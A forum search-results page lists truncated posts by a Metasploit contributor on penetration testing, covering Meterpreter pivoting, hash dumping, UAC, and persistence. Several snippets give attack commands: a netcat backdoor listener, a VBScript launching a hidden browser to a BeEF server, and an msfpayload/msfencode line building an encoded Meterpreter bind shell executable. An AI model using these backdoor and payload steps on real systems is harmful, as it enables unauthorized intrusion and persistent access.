Search:

Type: Posts; User: BadKarmaPR; Keyword(s):

Page 1 of 5 1 2 3 4

Search: Search took 0.00 seconds.

  1. Replies
    6
    Views
    2,225

    Thanks for the kind words, I'm glad you liked my...

    Thanks for the kind words, I'm glad you liked my script. I will posting later today my slide deck from my part of thepresentation with HD and JR on Meterpreter where I covered Meterpreter Scripting I...
  2. Replies
    18
    Views
    5,315

    did you needed to reboot for the UAC disable to...

    did you needed to reboot for the UAC disable to take effect or did it work with out the rebbot?
  3. Replies
    18
    Views
    5,315

    vista has protections as well as windows 2008,...

    vista has protections as well as windows 2008, you have to be system to be able to dump the hashes, you can do this by either using an exploit that gives you system or use schtasks to schedule a...
  4. Replies
    14
    Views
    5,074

    Meterpreter is a great payload for launching...

    Meterpreter is a great payload for launching attacks but it does has its limitations like:

    Single Thread
    Does not currently have a sys proxy capability - So no Nmap scanning thru the pivot...
  5. Replies
    136
    Views
    71,459

    sorry it has been a long time since I logged in...

    sorry it has been a long time since I logged in to the forum

    http://www.darkoperator.com/tools-and-scripts/
  6. Replies
    10
    Views
    2,765

    Try this ...

    Try this

    http://darkoperator.blogspot.com/2009/04/dns-recon-tool-written-in-ruby.html
  7. Replies
    102
    Views
    78,534

    Hey bro No problem with that, Metasploit is...

    Hey bro

    No problem with that, Metasploit is more for a full book if you want to cover it and it is always changing, I had the same idea about showing only the hash extraction, if you need any help...
  8. Replies
    14
    Views
    4,521

    yes the code should be updated, now in MSF3 if...

    yes the code should be updated, now in MSF3 if you want to know what DB driver is active you issue the db_driver command, if you want to change to another supported driver do db_driver and its name...
  9. Replies
    102
    Views
    78,534

    great work and the thing I love the most is in...

    great work and the thing I love the most is in the hydra section, you covered using a single thread and not 30 or 40 like I have seen in other tutorials, I have seen routers being DoS by inexperience...
  10. Replies
    14
    Views
    5,074

    could you please post the steps that you used, my...

    could you please post the steps that you used, my understanding was that in meterpreter the route command was for the pivoting of exploits that had the support to be channeled thru the meterpreter...
  11. Replies
    44
    Views
    17,832

    niceeeeeeee!!! never seen this one before, it is...

    niceeeeeeee!!! never seen this one before, it is along the lines of using the inguardians tool and sc but in less steps.
  12. Replies
    44
    Views
    17,832

    netcat is a true backdoor, it has to be the most...

    netcat is a true backdoor, it has to be the most flexible tool there is, I would suggest cryptcat for pentest, but then again rarely in a pentest the ROE let us place backdoor because we add risk to...
  13. Replies
    44
    Views
    17,832

    netsh is a windows command to configure network...

    netsh is a windows command to configure network settings not a linux command, I would recommend that you first get a Netcat backdoor working since it is the simplest. nc -L -d -p <backdoor port of...
  14. Replies
    44
    Views
    17,832

    it will portforward any remote port to a local...

    it will portforward any remote port to a local port through the Meterpreter channel, useful for when wanting to connect to the targets RDP or Telnet.
    good example:...
  15. Replies
    44
    Views
    17,832

    to make a beef backdoor first do the following,...

    to make a beef backdoor first do the following, we create a vbscript that will launch a hidden iexplorer pointed to our beef server:


    echo CreateObject("Wscript.Shell").Run "iexplore.exe -new...
  16. Replies
    44
    Views
    17,832

    some notes: for backdoors use bind shells...

    some notes:

    for backdoors use bind shells since they will open the port and just listen.
    you have to open the port in the local firewall is it is enabled
    if your target is behind a firewall...
  17. Replies
    44
    Views
    17,832

    if UAC is enabled this is going to be a hard one...

    if UAC is enabled this is going to be a hard one to make, you can place it in the programs startup folder. schtasks should let you schedule as the user the same as AT.
  18. Replies
    44
    Views
    17,832

    Thanks, sadly the portfwrd command in meterpreter...

    Thanks, sadly the portfwrd command in meterpreter in version 3.2 is broken you might try to get a copy of 3.0 and test on it and also on 3.1 with reverse shell since it fails on the bind shell since...
  19. Replies
    44
    Views
    17,832

    why not use Metasploit it self? create a payload...

    why not use Metasploit it self? create a payload with msfpayload something like this:


    /msfpayload windows/meterpreter/bind_tcp LPORT=8080 R | ./msfencode -c 2 -t exe -o 345532.exe


    then...
  20. Replies
    15
    Views
    2,978

    use the passivex payload, it will set the payload...

    use the passivex payload, it will set the payload as an activex on IE and use it's configured proxy to make the connection back to the attacking host. Natron is working on improving it to work better...
  21. Replies
    14
    Views
    5,074

    The only way to achive what you want you will...

    The only way to achive what you want you will have to upload scanline and use it to scan from the compromised host.
    meterpreter currently does not have that capability
  22. Discussioni: Cain & Abel

    by BadKarmaPR
    Replies
    13
    Views
    23,021

    Bro it is to all of us!!, I think hard and long...

    Bro it is to all of us!!, I think hard and long before I send a Meterpreter Script for commitment in to MSF3 and release some of my tools since I know the use that some kid or who knows who is going...
  23. Discussioni: Cain & Abel

    by BadKarmaPR
    Replies
    13
    Views
    23,021

    Chaemelion, wine can emulate only a subset of the...

    Chaemelion, wine can emulate only a subset of the win32 API and not all other windows components do to the Complexity and requirements it can not be ran on wine. I may suggest you install virtualbox...
  24. Replies
    11
    Views
    4,101

    as you can see in the quote I did mention...

    as you can see in the quote I did mention procesexplorer :p

    I'm more of a command shell guy my self, pstools also has tools for looking at the dll's loaded and can be scripted to run against...
  25. Replies
    3
    Views
    4,845

    you know that some of this tools are for...

    you know that some of this tools are for uploading to a target host line nc.exe, pulist, fgdump ... among others, but nice work either way on the ones that need to be in the menu.
Results 1 to 25 of 101
Page 1 of 5 1 2 3 4